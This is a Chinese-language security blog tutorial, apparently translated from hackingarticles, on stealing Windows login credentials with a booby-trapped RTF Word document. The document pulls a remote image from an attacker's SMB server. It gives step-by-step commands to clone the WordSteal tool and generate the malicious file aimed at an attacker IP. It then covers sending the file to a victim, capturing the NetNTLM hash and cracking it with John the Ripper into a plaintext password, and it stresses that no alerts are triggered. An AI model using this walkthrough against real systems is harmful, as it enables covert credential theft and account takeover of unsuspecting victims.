使用MS Office文档窃取远程PC的Windows凭证

关注 2017-04-10 11:14:03 查看数 24287 ,评论数 0 系统安全
Microsoft Word允许包含远程位置的图像。这是一个没有明确说明的功能,但被恶意软件创建者用来通过http来统计数据。我们还可以将远程文件包含到SMB服务器中,这在Pentest中非常有用,因为这样允许您窃取凭据而不触发任何警报,并且大多数安全应用程序都不会检测到这一点 攻击者:Kali Linux 目标:Windows 10( Microsoft Word 2007 )

LET’s Broach!!!

首先,我们需要从Github下载工具,在Kali Linux中打开终端并输入以下命令。
Git clone https://github.com/0x090x0/WordSteal.git
1 现在打开下载的文件夹word steal,你将看到一个python脚本“ main.py ”然后给main.py脚本所有权限。
Chmod 777 main.py
该脚本将会把jpg文件转换成rtf文件(Microsoft Word文件) 然后下载 图像并将其保存在Wordsteal文件夹中,我现在有一个图像“ 1.jpg ”,我们需要键入以下命令,它可以生成一个能从远程计算机窃取NTML hash的.rtf文件。
Python main.py 192.168.0.104 1.jpg 1
2 以上命令将生成.rtf文件,您可以在屏幕截图中看到这一点,然后将 1.rtf文件发送到远程PC。 3 当受害者在他的系统中打开1.rtf(作为Microsoft Word文件)时,攻击者会收到NTML哈希值。 4 在 word steal文件夹中我们可以看到我们已经成功窃取到了登录凭据,而不会触发任何警报 5 现在使用密码破解工具john ripper破解在password_netntlmv2文件中的哈希或键入以下命令
John password_netntlmv2
Cool!!!我们可以清楚地看到受害者的证书RAJ:123,这可能会进一步用于登录。 6  

*来源:hackingarticles,MottoIN小编编译发布,转载请注明来自MottoIN

交流评论(0)
Loading...
点击 ,就能发表评论哦~如果您还没有账号,请 一个吧

广告

关注我们 查看更多精彩文章

css.php
正在加载中...